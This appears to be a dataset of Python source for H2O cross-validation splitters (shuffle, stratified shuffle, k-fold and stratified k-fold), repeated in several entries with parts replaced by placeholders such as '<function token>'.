shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
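The helper _validate_shuffle_split that both splitters call is referenced but never shown in this dump. As a rough sketch of its assumed contract (modeled on the scikit-learn helper of the same name, so the exact rounding rules below are a guess, not the module's code):

import numpy as np

def validate_shuffle_split_sketch(n_samples, test_size, train_size):
    # Float sizes are treated as fractions of n_samples; ints as counts.
    n_test = (int(np.ceil(test_size * n_samples))
              if isinstance(test_size, float) else int(test_size))
    if train_size is None:
        n_train = n_samples - n_test
    elif isinstance(train_size, float):
        n_train = int(np.floor(train_size * n_samples))
    else:
        n_train = int(train_size)
    if n_train + n_test > n_samples:
        raise ValueError('train + test sizes exceed n_samples=%d' % n_samples)
    return n_train, n_test

print(validate_shuffle_split_sketch(100, 0.1, None))  # (90, 10)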
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
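A worked example of the proportional allocation inside H2OStratifiedShuffleSplit._iter_indices: each class share p_i is scaled to the requested train and test counts, and t_i is capped so no class is oversampled. The counts below are illustrative only.

import numpy as np

class_counts = np.array([60, 30, 10])  # three classes over 100 rows
n_samples, n_train, n_test = 100, 80, 20
p_i = class_counts / float(n_samples)                 # [0.6, 0.3, 0.1]
n_i = np.round(n_train * p_i).astype(int)             # train rows: [48, 24, 8]
t_i = np.minimum(class_counts - n_i,
                 np.round(n_test * p_i).astype(int))  # test rows: [12, 6, 2]
print(n_i.sum(), t_i.sum())  # 80 20 -- sums match the requested sizes here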
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
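The fold sizing in H2OKFold._iter_test_indices is easiest to see with concrete numbers: every fold gets n_obs // n_folds rows, the first n_obs % n_folds folds absorb one extra row, and the sizes always sum to n_obs. A standalone rendering of that loop:

import numpy as np

n_obs, n_folds = 10, 3
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)
fold_sizes[:n_obs % n_folds] += 1
print(fold_sizes)  # [4 3 3]
indices = np.arange(n_obs)
current = 0
for fold_size in fold_sizes:
    start, stop = current, current + fold_size
    print(indices[start:stop])  # contiguous test block for this fold
    current = stop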
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, 